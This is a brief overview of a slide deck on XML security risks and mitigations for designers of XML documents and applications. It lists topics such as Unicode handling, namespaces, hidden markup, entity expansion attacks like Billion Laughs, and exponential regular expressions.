XML Risks and Mitigations

The material in these slides cover many of the basic security considerations of XML. People who design XML documents and applications should know and understand these considerations. The material explains the various aspects of XML security. It presents basic information about XML and discusses how these fundamental truths influence XML security. It describes a range of XML security issues, including several that are sometimes overlooked. The objective is to help the reader become better informed about which security concepts apply to a given use case and obtain recommendations for implementing those security concepts. The slides do not repeat step-by-step instructions that are provided elsewhere. For example, the slides might recommend that an XML document be digitally signed to provide authentication or integrity protection, but it does not explain in detail how to digitally sign an XML document. Rather, the reader is referred to the XML Digital Signature specification. The slides discuss the risks and mitigations of: Using Unicode in XML documents Unused namespaces Namespace prefixes Hidden markup Exponentially expanding external entities (for example, Billion Laughs Attack) Exponential regular expressions